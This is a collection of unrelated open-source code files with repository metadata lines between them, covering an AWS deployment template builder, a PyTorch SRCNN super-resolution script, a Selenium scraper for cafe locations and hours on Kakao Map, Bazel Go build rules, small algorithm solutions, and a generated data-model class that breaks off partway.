        manage.write(" " + versionAlisaName + ":\n")
        for line in f2.readlines():
            manage.write(line.replace("${ReplaceLmdName}", lambdaArg["functionName"])
                         .replace("${ReplaceVersionResource}", versionResourceName)
                         .replace("${ReplaceVersion}", event["version"])
                         )
        manage.write("\n")
        f1.close()
    # Append the sfnTemplate.yaml contents (the state machine) to the manage file.
    f3 = open(sfnLocalPath, "r")
    manage.write(" " + event["runtime"].upper() + "PhStateMachine:")
    manage.write("\n")
    for line in f3.readlines():
        manage.write(line.replace("${S3Bucket}", event["stepFunctionArgs"]["S3Bucket"])
                     .replace("${S3TemplateKey}", event["stepFunctionArgs"]["S3TemplateKey"].replace("sm.json", "modify_sm.json"))
                     .replace("${StateMachineName}", event["stepFunctionArgs"]["StateMachineName"] + "-" + event["runtime"])
                     .replace("${SubmitOwner}", event["stepFunctionArgs"]["SubmitOwner"])
                     .replace("${Date}", str(int(round(time.time() * 1000))))
                     )
        manage.write("\n")
    manage.write("Transform: AWS::Serverless-2016-10-31")
    manage.close()
    upload_s3_file(
        bucket_name=manageTemplateS3Key,
        object_name=resourcePathPrefix + event["processor"]["prefix"] + "/manage.yaml",
        file=mangeLocalPath
    )
    manageUrl = manageUrlPrefix + event["processor"]["prefix"] + "/manage.yaml"
    stackName = event["processor"]["stateMachineName"] + "-resource"
    return {
        "manageUrl": manageUrl,
        "stackName": stackName,
        "stackParameters": {}
    }
| PharbersDeveloper/phlambda | devops/cicd/phcicdupdateasyncmanageyaml/src/main.py | main.py | py | 9,233 | python | en | code | 0 | github-code | 90 |
7893164612 | import cv2
import numpy as np
import torch
import torch.onnx
from torch import nn
class SuperResolutionNet(nn.Module):
    """SRCNN-style super resolution: bicubic upsampling + a 3-layer conv net.

    Attribute names (``img_upsampler``, ``conv1``..``conv3``, ``relu``) are
    part of the checkpoint's state_dict layout and must not be renamed.
    """

    def __init__(self, upscale_factor):
        super().__init__()
        self.upscale_factor = upscale_factor
        # Deterministic bicubic interpolation brings the image to the target
        # resolution before any learned filtering.
        self.img_upsampler = nn.Upsample(
            scale_factor=self.upscale_factor,
            mode='bicubic',
            align_corners=False)
        # Feature extraction (9x9), non-linear mapping (1x1), reconstruction
        # (5x5); paddings keep the spatial size unchanged.
        self.conv1 = nn.Conv2d(3, 64, kernel_size=9, padding=4)
        self.conv2 = nn.Conv2d(64, 32, kernel_size=1, padding=0)
        self.conv3 = nn.Conv2d(32, 3, kernel_size=5, padding=2)
        self.relu = nn.ReLU()

    def forward(self, x):
        upsampled = self.img_upsampler(x)
        features = self.relu(self.conv1(upsampled))
        mapped = self.relu(self.conv2(features))
        return self.conv3(mapped)
def init_torch_model():
    """Instantiate the x4 SRCNN and load its weights from ``srcnn.pth``.

    Checkpoint keys carry a leading wrapper prefix; the first dotted
    component is stripped so they match this module's attribute names.
    """
    net = SuperResolutionNet(upscale_factor=4)
    state_dict = torch.load('srcnn.pth')['state_dict']
    # Adapt the checkpoint keys in place.
    for checkpoint_key in list(state_dict.keys()):
        local_key = '.'.join(checkpoint_key.split('.')[1:])
        state_dict[local_key] = state_dict.pop(checkpoint_key)
    net.load_state_dict(state_dict)
    net.eval()
    return net
# Run SRCNN on face.png and write the upscaled result to face_torch.png.
model = init_torch_model()
input_img = cv2.imread('face.png').astype(np.float32)
# HWC to NCHW N:batch C:channel H:height W:width
input_img = np.transpose(input_img, [2, 0, 1]) # reorder the axes HWC -> CHW
input_img = np.expand_dims(input_img, 0) # prepend a batch axis of size 1
# Inference
torch_output = model(torch.from_numpy(input_img)).detach().numpy()
# NCHW to HWC
torch_output = np.squeeze(torch_output, 0) # drop the batch axis
torch_output = np.clip(torch_output, 0, 255) # clamp into the valid 8-bit range
torch_output = np.transpose(torch_output, [1, 2, 0]).astype(np.uint8) # back to HWC, uint8 0-255
# Show image
cv2.imwrite("face_torch.png", torch_output) # imwrite accepts BGR 3-channel, 8-bit single-channel, or PNG/JPEG/TIFF 16-bit unsigned single-channel images
# with torch.no_grad():
#     torch.onnx.export(
#         model,
#         torch.randn(1, 3, 256, 256),
#         "srcnn.onnx",
#         opset_version=11,
#         input_names=['input'],
#         output_names=['output'])
| zhiqing66/ONNX_Learn | SRCNN/srcnn.py | srcnn.py | py | 2,301 | python | en | code | 1 | github-code | 90 |
6290680345 |
# - Scrapping information on places
# - Scrapping results from a given query(e.g. "스타벅스").
# - Information including name, address, and working time
# - Data from Kakao map
import numpy as np
import pandas as pd
from selenium import webdriver
from selenium.webdriver import ActionChains
from selenium.webdriver import Keys
import time
import re
# One Selenium-driven Kakao Map session reused for every query below.
driver = webdriver.Chrome(r'C:\Users\usju\Downloads\chromedriver_win32\chromedriver.exe')
driver.get(r'https://map.kakao.com/')
driver.find_element('xpath', '//*[@id="dimmedLayer"]').click()
# Korean region names used to regionalize the search query.
region = np.array(['강원','세종','경기','경남','대구','광주','대전','부산','울산','인천','전북','제주','충북','경북','서울','전남','충남'])
region_list = []
name_addr_dic = {}
# For every region, search "<region> 투썸플레이스" and harvest name/address
# pairs from up to 5 result pages at a time until the pager is exhausted.
for reg in region:
    temp = []
    q = reg + ' ' + '투썸플레이스'
    driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(q)
    driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.ENTER)
    time.sleep(1.5)
    try:
        # Expand the full place list (the "more" button), when present.
        ac = ActionChains(driver)
        dobogi = driver.find_element('xpath', '//*[@id="info.search.place.more"]')
        ac.move_to_element(dobogi)
        driver.find_element('xpath', '//*[@id="info.search.place.more"]').click()
        time.sleep(1.5)
    except:
        pass
    try:
        while True:
            for i in range(1, 6):
                driver.find_element('xpath', '//*[@id="info.search.page.no{}"]'.format(i)).click()
                time.sleep(1.5)
                name_list = driver.find_elements('xpath', '//*[@id="info.search.place.list"]/li/div[3]/strong/a[2]')
                addr_list = driver.find_elements('xpath', '//*[@id="info.search.place.list"]/li/div[5]/div[2]/p[1]')
                for n, a in zip(name_list, addr_list):
                    name_addr_dic[n.text] = a.text
                    temp.append(n)
            next_button = driver.find_element('xpath', '//*[@id="info.search.page.next"]')
            if next_button.get_attribute('class') != 'next disabled':
                driver.find_element('xpath', '//*[@id="info.search.page.next"]').click()
                time.sleep(1.5)
            elif next_button.get_attribute('class') == 'next disabled':
                break
    except:
        pass
    for _ in range(len(temp)):
        region_list.append(reg)
    # Clear the search box one key at a time before the next region.
    for _ in range(50):
        driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
# Flatten the collected dict into parallel arrays and save to Excel.
n = np.array([])
a = np.array([])
for nn,aa in zip(name_addr_dic.keys(), name_addr_dic.values()):
    n = np.append(n,nn)
    a = np.append(a,aa)
pd.DataFrame({'name':n, 'address':a}).to_excel(r'atwosomeplace.xlsx')
# -- Additional crawl: business hours for each place collected above --
import re  # re.sub is used below but `re` is not imported in this script's header
name_df = pd.read_excel('twosome_name.xlsx')
driver = webdriver.Chrome(r'C:\Users\usju\Downloads\chromedriver_win32\chromedriver.exe')
driver.get(r'https://map.kakao.com/')
driver.find_element('xpath', '//*[@id="dimmedLayer"]').click()
name = name_df['name'].values
time_table = {}
for i in range(len(name)):
    time_get = None
    place_name = name[i]
    try:
        # Search the place and open its detail page (opens a new window).
        driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(place_name)
        driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.ENTER)
        time.sleep(1.5)
        driver.find_element('xpath', '//*[@id="info.search.place.list"]/li[1]/div[5]/div[3]/p/a').click()
    except:
        pass
    if len(driver.window_handles) == 1:
        # The detail window did not open; clear the box and retry once.
        try:
            for _ in range(30):
                driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
            driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(name[i])
            driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.ENTER)
            time.sleep(1.5)
            driver.find_element('xpath', '//*[@id="info.search.place.list"]/li[1]/div[5]/div[3]/p/a').click()
        except:
            for _ in range(30):
                driver.find_element('xpath', '//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
    try:
        # Read the multi-line working-hours list from the detail window.
        time.sleep(1.5)
        driver.switch_to.window(driver.window_handles[1])
        time_get = driver.find_element('xpath', '//*[@id="mArticle"]/div[1]/div[2]/div[2]/div/div[2]/div/ul').text
        driver.close()
        driver.switch_to.window(driver.window_handles[0])
    except:
        pass
    if time_get is None:
        # Fall back to the single-line working-hours layout.
        try:
            time.sleep(1.5)
            time_get = driver.find_element('xpath', '//*[@id="mArticle"]/div[1]/div[2]/div[2]/div/div/ul/li/span').text
            driver.close()
            driver.switch_to.window(driver.window_handles[0])
        except:
            time_get = ''
    if len(driver.window_handles) == 2:
        # A stray detail window is still open; close it.
        driver.close()
        driver.switch_to.window(driver.window_handles[0])
    time_get = re.sub('\n', '|', time_get)
    time_table[name[i]] = time_get
    for _ in range(30):
        driver.find_element('xpath','//*[@id="search.keyword.query"]').send_keys(Keys.BACKSPACE)
# df['time_table'] = time_table
# df.to_excel(r'20220913_starbucks_finished.xlsx')
name_get = np.array([])
time_get = np.array([])
for k,v in zip(time_table.keys(), time_table.values()):
    name_get = np.append(name_get, k)
    time_get = np.append(time_get, v)
pd.DataFrame({'name':name_get,'time':time_get}).to_excel('atwosome_time.xlsx')
| WusuhkJu/etc | kakaomap_scrapping.py | kakaomap_scrapping.py | py | 5,602 | python | en | code | 0 | github-code | 90 |
22770276773 | class Solution:
def PrintMinNumber(self, numbers):
# write code here
str_list = []
length = 0
for i in numbers:
str_i = str(i)
length = max(length,len(str_i))
str_list.append(str_i)
full_str_dict = {}
for i in str_list:
str_full = ""
if len(i) < length:
str_full += i[0] * (length-len(i))
str_full += i
if str_full in full_str_dict.keys():
full_str_dict[str_full] += i
else:
full_str_dict[str_full] = i
keys = full_str_dict.keys()
keys = sorted(keys)
all_str = ""
for i in keys:
all_str += full_str_dict[i]
return int(all_str)
# Quick manual check: all orderings of 1/11/111 concatenate to 111111.
u = Solution()
print(u.PrintMinNumber([1,11,111])) | amisyy/leetcode | printMinNumber.py | printMinNumber.py | py | 825 | python | en | code | 0 | github-code | 90 |
18487342249 | n=int(input())
data=[]
for i in range(n):
X,Y,H=map(int,input().split())
data.append([H,X,Y])
data.sort(reverse=True)
for i in range(101):
for j in range(101):
H=abs(data[0][1]-i)+abs(data[0][2]-j)+data[0][0]
for k in range(1,n):
if max(H-abs(data[k][1]-i)-abs(data[k][2]-j),0)==data[k][0]:
continue
else:
break
else:
print(str(i), str(j), str(H))
| Aasthaengg/IBMdataset | Python_codes/p03240/s272785580.py | s272785580.py | py | 453 | python | en | code | 0 | github-code | 90 |
18180679559 | n=int(input())
def solve(x):
    """For each bit i of binary string x, count the "n -> n mod popcount(n)"
    steps needed to reach 0 after flipping bit i.

    The first step is computed with precomputed residues of x modulo
    popcount+1 / popcount-1 (three-argument ``pow`` keeps the 2**k terms
    cheap); later steps act on small numbers and are iterated directly.
    The original script forgot to count that first step when the flipped
    bit was a 0 (``ans+=1`` appeared only in the "1" branch).
    """
    n = len(x)
    val = int(x, 2)
    cnt = x.count("1")
    plus_mod = cnt + 1                 # popcount after flipping a 0 bit
    minus_mod = cnt - 1                # popcount after flipping a 1 bit
    plus_rem = val % plus_mod
    minus_rem = val % minus_mod if minus_mod > 0 else 0
    answers = []
    for i, bit in enumerate(x):
        if bit == "1":
            if minus_mod == 0:
                # Flipping the only 1 yields 0 immediately: zero steps.
                answers.append(0)
                continue
            r = (minus_rem - pow(2, n - i - 1, minus_mod)) % minus_mod
        else:
            r = (plus_rem + pow(2, n - i - 1, plus_mod)) % plus_mod
        ops = 1  # the reduction above is already one step
        while r:
            r %= bin(r).count("1")
            ops += 1
        answers.append(ops)
    return answers


if __name__ == "__main__":
    x = input()
    for steps in solve(x):
        print(steps)
| Aasthaengg/IBMdataset | Python_codes/p02609/s313746131.py | s313746131.py | py | 475 | python | en | code | 0 | github-code | 90 |
# Extra Go tool flags keyed by Bazel compilation mode; dbg builds enable the
# race detector throughout.
24009078352 | compile_args = {
    "opt": [],
    "fastbuild": [],
    "dbg": ["-race"],
}
# Flags for non-hermetic `go build` invocations (the go_build escape hatch).
build_args = {
    "opt": [],
    "fastbuild": [],
    "dbg": ["-race"],
}
# Linker flags; -w/-s strip DWARF debug info and the symbol table.
link_args = {
    "opt": [
        "-w",
        "-s",
    ],
    "fastbuild": [
        "-w",
        "-s",
    ],
    "dbg": ["-race"],
}
# Darwin omits -s; see the linked Go issue.
link_args_darwin = {
    # https://github.com/golang/go/issues/10254
    "opt": [
        "-w",
    ],
    "fastbuild": [
        "-w",
    ],
    "dbg": ["-race"],
}
def replace_prefix(s, prefixes):
  """Rewrite the start of `s` per the first matching entry of `prefixes`.

  `prefixes` maps old prefix -> replacement; `s` is returned unchanged when
  no prefix matches.
  """
  for old in prefixes:
    if s.startswith(old):
      return prefixes[old] + s[len(old):]
  return s
# Include-flag prefixes rewritten to $PWD-anchored forms (see replace_prefix
# and its use on cc dep compile flags in _go_compile).
include_prefix_replacements = {
    "-isystem ": "-isystem $PWD/",
    "-iquote ": "-iquote $PWD/",
    "-I ": "-I $PWD/",
}
def _package_name(ctx):
  """Go import path for a target: prefix + package ('/name' appended when
  multi_package), with a trailing '_go' stripped."""
  pkg = ctx.attr._go_package_prefix.go_prefix + ctx.label.package
  if ctx.attr.multi_package:
    pkg += "/" + ctx.label.name
  if pkg.endswith("_go"):
    pkg = pkg[:-3]
  return pkg
def _construct_go_path(root, package_map):
  """Shell commands that lay out a GOPATH-style tree of symlinks under `root`.

  `package_map` maps import path -> archive file path; each package gets a
  `<root>/<pkg>.a` symlink pointing (relatively) back at its archive.
  """
  commands = ['rm -rf ' + root, 'mkdir ' + root]
  for pkg, archive_path in package_map.items():
    slash = pkg.rfind('/')
    pkg_dir = '/'.join([root, pkg[:slash]])
    up_links = '../' * pkg_dir.count('/')
    link_path = pkg_dir + '/' + pkg[slash + 1:] + '.a'
    commands.append('mkdir -p ' + pkg_dir)
    commands.append('ln -s ' + up_links + archive_path + ' ' + link_path)
  return commands
def _construct_package_map(packages):
  """Split package structs into their archive files and a name -> archive-path map."""
  archives = [pkg.archive for pkg in packages]
  package_map = {pkg.name: pkg.archive.path for pkg in packages}
  return archives, package_map
# TODO(schroederc): remove this if https://github.com/bazelbuild/bazel/issues/539 is ever fixed
def _dedup_packages(packages):
  """Drop packages whose name was already seen, keeping first occurrences in order.

  NOTE(review): `seen` is a (long-deprecated) Bazel `set` grown with `+=`;
  this is legacy-Starlark behavior, not valid Python — confirm against the
  Bazel version in use.
  """
  seen = set()
  filtered = []
  for pkg in packages:
    if pkg.name not in seen:
      seen += [pkg.name]
      filtered += [pkg]
  return filtered
def _go_compile(ctx, pkg, srcs, archive, extra_packages=[]):
  """Compile the Go sources of package `pkg` into `archive`.

  Gathers transitive Go deps (from ctx.attr.deps plus `extra_packages`) and
  cgo/C inputs, then runs either a non-hermetic `go build` (go_build mode)
  or a hermetic `go tool compile` against a synthesized GOPATH of dep
  archives.  Returns (transitive_deps, cgo_link_flags, transitive_cc_libs)
  for the link step.
  """
  cgo_link_flags = set([], order="link")
  transitive_deps = []
  transitive_cc_libs = set()
  for dep in ctx.attr.deps:
    transitive_deps += dep.go.transitive_deps
    cgo_link_flags += dep.go.cgo_link_flags
    transitive_cc_libs += dep.go.transitive_cc_libs
  transitive_deps += extra_packages
  transitive_deps = _dedup_packages(transitive_deps)
  archives, package_map = _construct_package_map(transitive_deps)
  # Collect C/C++ headers, libraries and flags for cgo, rewriting include
  # paths to $PWD-anchored forms (see include_prefix_replacements).
  cc_inputs = set()
  cgo_compile_flags = set([], order="compile")
  if hasattr(ctx.attr, "cc_deps"):
    for dep in ctx.attr.cc_deps:
      cc_inputs += dep.cc.transitive_headers
      cc_inputs += dep.cc.libs
      transitive_cc_libs += dep.cc.libs
      cgo_link_flags += dep.cc.link_flags
      for lib in dep.cc.libs:
        cgo_link_flags += ["$PWD/" + lib.path]
      for flag in dep.cc.compile_flags:
        cgo_compile_flags += [replace_prefix(flag, include_prefix_replacements)]
  gotool = ctx.file._go
  if ctx.attr.go_build:
    # Cheat and build the package non-hermetically (usually because there is a cgo dependency)
    args = build_args[ctx.var['COMPILATION_MODE']]
    cmd = "\n".join([
        'export CC=' + ctx.var['CC'],
        'export CGO_CFLAGS="' + ' '.join(list(cgo_compile_flags)) + '"',
        'export CGO_LDFLAGS="' + ' '.join(list(cgo_link_flags)) + '"',
        'export GOPATH="$PWD/' + ctx.label.package + '"',
        gotool.path + ' build -a ' + ' '.join(args) + ' -o ' + archive.path + ' ' + ctx.attr.package,
    ])
    mnemonic = 'GoBuild'
  else:
    # Hermetic path: pick the tool name by Go version (6g pre-1.5, compile after).
    args = compile_args[ctx.var['COMPILATION_MODE']]
    go_path = archive.path + '.gopath/'
    cmd = "\n".join(_construct_go_path(go_path, package_map) + [
        'if ' + gotool.path + ' tool | grep -q 6g; then TOOL=6g; else TOOL=compile; fi',
        gotool.path + " tool $TOOL " + ' '.join(args) + " -p " + pkg + " -complete -pack -o " + archive.path + " " +
        '-I "' + go_path + '" ' + cmd_helper.join_paths(" ", set(srcs)),
    ])
    mnemonic = 'GoCompile'
  cmd = "\n".join([
      'set -e',
      'export GOROOT=$PWD/external/local-goroot',
      cmd,
  ])
  ctx.action(
      inputs = ctx.files._goroot + srcs + archives + list(cc_inputs),
      outputs = [archive],
      mnemonic = mnemonic,
      command = cmd,
      use_default_shell_env = True)
  return transitive_deps, cgo_link_flags, transitive_cc_libs
def _go_library_impl(ctx):
  """go_library implementation: compile srcs into the declared archive and
  expose a `go` provider (sources, package struct, transitive deps and
  cgo/C link info)."""
  archive = ctx.outputs.archive
  # An explicit `package` attr overrides the derived import path.
  if ctx.attr.package == "":
    pkg = _package_name(ctx)
  else:
    pkg = ctx.attr.package
  # TODO(shahms): Figure out why protocol buffer .jar files are being included.
  srcs = FileType([".go"]).filter(ctx.files.srcs)
  package = struct(
      name = pkg,
      archive = archive,
  )
  transitive_deps, cgo_link_flags, transitive_cc_libs = _go_compile(ctx, package.name, srcs, archive)
  return struct(
      go = struct(
          sources = ctx.files.srcs,
          package = package,
          transitive_deps = transitive_deps + [package],
          cgo_link_flags = cgo_link_flags,
          transitive_cc_libs = transitive_cc_libs,
      ),
  )
def _link_binary(ctx, binary, archive, transitive_deps, extldflags=[], cc_libs=[]):
  """Link `archive` into executable `binary` with `go tool link` (6l on old
  Go), against a synthesized GOPATH of dependency archives; `extldflags`
  and `cc_libs` are forwarded to the external linker."""
  gotool = ctx.file._go
  for a in cc_libs:
    extldflags += [a.path]
  dep_archives, package_map = _construct_package_map(transitive_deps)
  go_path = binary.path + '.gopath/'
  # Darwin uses a reduced flag set (no -s); see link_args_darwin.
  if ctx.var['TARGET_CPU'] == 'darwin':
    args = link_args_darwin[ctx.var['COMPILATION_MODE']]
  else:
    args = link_args[ctx.var['COMPILATION_MODE']]
  cmd = ['set -e'] + _construct_go_path(go_path, package_map) + [
      'export GOROOT=$PWD/external/local-goroot',
      'export PATH',
      'if ' + gotool.path + ' tool | grep -q 6l; then TOOL=6l; else TOOL=link; fi',
      gotool.path + ' tool $TOOL -extldflags="' + ' '.join(list(extldflags)) + '"'
      + ' ' + ' '.join(args) + ' -L "' + go_path + '"'
      + ' -o ' + binary.path + ' ' + archive.path + ';',
  ]
  ctx.action(
      inputs = ctx.files._goroot + [archive] + dep_archives + list(cc_libs),
      outputs = [binary],
      mnemonic = 'GoLink',
      command = "\n".join(cmd),
      use_default_shell_env = True)
def binary_struct(ctx, extra_runfiles=[]):
  """Common provider for executable Go rules: forwards ctx.attr.args and
  bundles the executable, `extra_runfiles` and collected data deps as
  runfiles."""
  runfiles = ctx.runfiles(
      files = [ctx.outputs.executable] + extra_runfiles,
      collect_data = True,
  )
  return struct(
      args = ctx.attr.args,
      runfiles = runfiles,
  )
def _go_binary_impl(ctx):
  """go_binary implementation: compile srcs as package 'main', then link.

  The compile step's transitive package/link info is fed straight into the
  linker together with any transitive C libraries.  (An unused `gotool`
  local was removed; _go_compile/_link_binary fetch the tool themselves.)
  """
  archive = ctx.new_file(ctx.configuration.bin_dir, ctx.label.name + ".a")
  transitive_deps, cgo_link_flags, transitive_cc_libs = _go_compile(ctx, 'main', ctx.files.srcs, archive)
  _link_binary(ctx, ctx.outputs.executable, archive, transitive_deps,
               extldflags=cgo_link_flags,
               cc_libs=transitive_cc_libs)
  return binary_struct(ctx)
def _go_test_impl(ctx):
  """go_test implementation: generate a test main, compile the test package
  (library srcs + *_test.go srcs), link the raw runner into %{name}.bin,
  and emit a wrapper script that can convert the test log to XML."""
  lib = ctx.attr.library
  pkg = _package_name(ctx)
  # Construct the Go source that executes the tests when run.
  test_srcs = ctx.files.srcs
  testmain = ctx.new_file(ctx.configuration.genfiles_dir, ctx.label.name + "main.go")
  testmain_generator = ctx.file._go_testmain_generator
  cmd = (
      'set -e;' +
      testmain_generator.path + ' ' + pkg + ' ' + testmain.path + ' ' +
      cmd_helper.join_paths(' ', set(test_srcs)) + ';')
  ctx.action(
      inputs = test_srcs + [testmain_generator],
      outputs = [testmain],
      mnemonic = 'GoTestMain',
      command = cmd,
      use_default_shell_env = True)
  # Compile the library along with all of its test sources (creating the test package).
  archive = ctx.new_file(ctx.configuration.bin_dir, ctx.label.name + '.a')
  transitive_deps, cgo_link_flags, transitive_cc_libs = _go_compile(
      ctx, pkg, test_srcs + lib.go.sources, archive,
      extra_packages = lib.go.transitive_deps)
  test_pkg = struct(
      name = pkg,
      archive = archive,
  )
  transitive_cc_libs += lib.go.transitive_cc_libs
  # Compile the generated test main.go source
  testmain_archive = ctx.new_file(ctx.configuration.bin_dir, ctx.label.name + "main.a")
  _go_compile(ctx, 'main', [testmain] + ctx.files._go_testmain_srcs, testmain_archive,
              extra_packages = [test_pkg])
  # Link the generated test runner
  _link_binary(ctx, ctx.outputs.bin, testmain_archive, transitive_deps + [test_pkg],
               extldflags=cgo_link_flags,
               cc_libs = transitive_cc_libs)
  # Construct a script that runs ctx.outputs.bin and parses the test log.
  test_parser = ctx.file._go_test_parser
  test_script = [
      "#!/bin/bash -e",
      'set -o pipefail',
      'if [[ -n "$XML_OUTPUT_FILE" ]]; then',
      '  %s -test.v "$@" | \\' % (ctx.outputs.bin.short_path),
      '  %s --format xml --out "$XML_OUTPUT_FILE"' % (test_parser.short_path),
      'else',
      '  exec %s "$@"' % (ctx.outputs.bin.short_path),
      'fi'
  ]
  ctx.file_action(
      output = ctx.outputs.executable,
      content = "\n".join(test_script),
      executable = True,
  )
  return binary_struct(ctx, extra_runfiles=[ctx.outputs.bin, test_parser])
# Attributes shared by every Go rule: sources, Go deps and build-mode
# switches, plus hidden labels wiring in the import-path prefix, the go
# tool binary, and GOROOT.
base_attrs = {
    "srcs": attr.label_list(allow_files = FileType([".go"])),
    "deps": attr.label_list(
        allow_files = False,
        providers = ["go"],
    ),
    "go_build": attr.bool(),
    "multi_package": attr.bool(),
    "_go_package_prefix": attr.label(
        default = Label("//external:go_package_prefix"),
        providers = ["go_prefix"],
        allow_files = False,
    ),
    "_go": attr.label(
        default = Label("//tools/go"),
        allow_files = True,
        single_file = True,
    ),
    "_goroot": attr.label(
        default = Label("//tools/go:goroot"),
        allow_files = True,
    ),
}
# Compiles a Go package into %{name}.a; cc_deps enables cgo against C/C++
# dependencies, `package` overrides the derived import path.
go_library = rule(
    _go_library_impl,
    attrs = base_attrs + {
        "cc_deps": attr.label_list(
            allow_files = False,
            providers = ["cc"],
        ),
        "package": attr.string(),
    },
    outputs = {"archive": "%{name}.a"},
)
# Shared attrs for runnable Go targets: adds runfile `data` deps (built in
# the data configuration).
binary_attrs = base_attrs + {
    "data": attr.label_list(
        allow_files = True,
        cfg = DATA_CFG,
    ),
}
# Builds an executable from package-main sources.
go_binary = rule(
    _go_binary_impl,
    attrs = binary_attrs,
    executable = True,
)
# Builds a Go test: %{name}.bin is the raw test binary; the default output
# is the wrapper script produced by _go_test_impl (XML-capable).
go_test = rule(
    _go_test_impl,
    attrs = binary_attrs + {
        "library": attr.label(providers = ["go"]),
        "_go_testmain_generator": attr.label(
            default = Label("//tools/go:testmain_generator"),
            single_file = True,
        ),
        "_go_test_parser": attr.label(
            default = Label("//tools/go:parse_test_output"),
            single_file = True,
        ),
        "_go_testmain_srcs": attr.label(
            default = Label("//tools/go:testmain_srcs"),
            allow_files = FileType([".go"]),
        ),
    },
    executable = True,
    outputs = {"bin": "%{name}.bin"},
    test = True,
)
def go_package(name=None, package=None,
               srcs="", deps=[], test_deps=[], test_args=[], test_data=[], cc_deps=[],
               tests=True, exclude_srcs=[], go_build=False,
               visibility=None):
  """Macro: declare a go_library (and optional go_test) from globbed sources.

  `srcs` names a directory (default: the package dir); *_test.go files feed
  the `<name>_test` target, everything else the library.  `name` defaults
  to the last component of the Bazel package path.
  """
  if not name:
    name = PACKAGE_NAME.split("/")[-1]
  if srcs and not srcs.endswith("/"):
    srcs += "/"
  exclude = []
  for src in exclude_srcs:
    exclude += [srcs+src]
  lib_srcs, test_srcs = [], []
  for src in native.glob([srcs+"*.go"], exclude=exclude, exclude_directories=1):
    if src.endswith("_test.go"):
      test_srcs += [src]
    else:
      lib_srcs += [src]
  go_library(
    name = name,
    srcs = lib_srcs,
    deps = deps,
    go_build = go_build,
    cc_deps = cc_deps,
    package = package,
    visibility = visibility,
  )
  if tests and test_srcs:
    go_test(
      name = name + "_test",
      srcs = test_srcs,
      library = ":" + name,
      deps = test_deps,
      args = test_args,
      data = test_data,
      visibility = ["//visibility:private"],
    )
# Configuration rule for go packages
def _go_prefix_impl(ctx):
  """Expose the configured import-path prefix as a `go_prefix` provider."""
  return struct(go_prefix = ctx.attr.prefix)
go_prefix = rule(
    _go_prefix_impl,
    attrs = {"prefix": attr.string()},
)
def go_package_prefix(prefix):
  """Macro: declare the workspace-wide Go import-path prefix, normalized to
  end with '/'; bound as //external:go_package_prefix by base_attrs."""
  if not prefix.endswith("/"):
    prefix = prefix + "/"
  go_prefix(
      name = "go_package_prefix",
      prefix = prefix,
      visibility = ["//visibility:public"],
  )
| google/qrisp | tools/build_rules/go.bzl | go.bzl | bzl | 12,080 | python | en | code | 10 | github-code | 90 |
30933307668 | import datetime
from typing import Any, Dict, List, Type, TypeVar, Union
import attr
from dateutil.parser import isoparse
from ..models.cnh_answer import CNHAnswer
from ..models.documento_answer import DocumentoAnswer
from ..models.endereco_answer import EnderecoAnswer
from ..models.face_answer import FaceAnswer
from ..models.filiacao_answer import FiliacaoAnswer
from ..models.pf_facial_answer_nacionalidade import PFFacialAnswerNacionalidade
from ..models.pf_facial_answer_sexo import PFFacialAnswerSexo
from ..models.pf_facial_answer_situacao_cpf import PFFacialAnswerSituacaoCpf
from ..types import UNSET, Unset
T = TypeVar("T", bound="PFFacialAnswer")
@attr.s(auto_attribs=True)
class PFFacialAnswer:
"""
Attributes:
nome (Union[Unset, str]):
data_nascimento (Union[Unset, datetime.date]):
situacao_cpf (Union[Unset, PFFacialAnswerSituacaoCpf]): regular, suspensa, titular falecido, pendente de
regularização, cancelada por multiplicidade, nula, cancelada de oficio
sexo (Union[Unset, PFFacialAnswerSexo]): F - female, M - male
nacionalidade (Union[Unset, PFFacialAnswerNacionalidade]): 1 - brazilian, 2 - naturalized brazilian, 3 -
foreigner, 4 - brazilian born abroad
cnh (Union[Unset, CNHAnswer]):
filiacao (Union[Unset, FiliacaoAnswer]):
documento (Union[Unset, DocumentoAnswer]):
endereco (Union[Unset, EnderecoAnswer]):
biometria_face (Union[Unset, FaceAnswer]):
"""
nome: Union[Unset, str] = UNSET
data_nascimento: Union[Unset, datetime.date] = UNSET
situacao_cpf: Union[Unset, PFFacialAnswerSituacaoCpf] = UNSET
sexo: Union[Unset, PFFacialAnswerSexo] = UNSET
nacionalidade: Union[Unset, PFFacialAnswerNacionalidade] = UNSET
cnh: Union[Unset, CNHAnswer] = UNSET
filiacao: Union[Unset, FiliacaoAnswer] = UNSET
documento: Union[Unset, DocumentoAnswer] = UNSET
endereco: Union[Unset, EnderecoAnswer] = UNSET
biometria_face: Union[Unset, FaceAnswer] = UNSET
additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)
def to_dict(self) -> Dict[str, Any]:
nome = self.nome
data_nascimento: Union[Unset, str] = UNSET
if not isinstance(self.data_nascimento, Unset):
data_nascimento = self.data_nascimento.isoformat()
situacao_cpf: Union[Unset, str] = UNSET
if not isinstance(self.situacao_cpf, Unset):
situacao_cpf = self.situacao_cpf.value
sexo: Union[Unset, str] = UNSET
if not isinstance(self.sexo, Unset):
sexo = self.sexo.value
nacionalidade: Union[Unset, int] = UNSET
if not isinstance(self.nacionalidade, Unset):
nacionalidade = self.nacionalidade.value
cnh: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.cnh, Unset):
cnh = self.cnh.to_dict()
filiacao: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.filiacao, Unset):
filiacao = self.filiacao.to_dict()
documento: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.documento, Unset):
documento = self.documento.to_dict()
endereco: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.endereco, Unset):
endereco = self.endereco.to_dict()
biometria_face: Union[Unset, Dict[str, Any]] = UNSET
if not isinstance(self.biometria_face, Unset):
biometria_face = self.biometria_face.to_dict()
field_dict: Dict[str, Any] = {}
field_dict.update(self.additional_properties)
field_dict.update({})
if nome is not UNSET:
field_dict["nome"] = nome
if data_nascimento is not UNSET:
field_dict["data_nascimento"] = data_nascimento
if situacao_cpf is not UNSET:
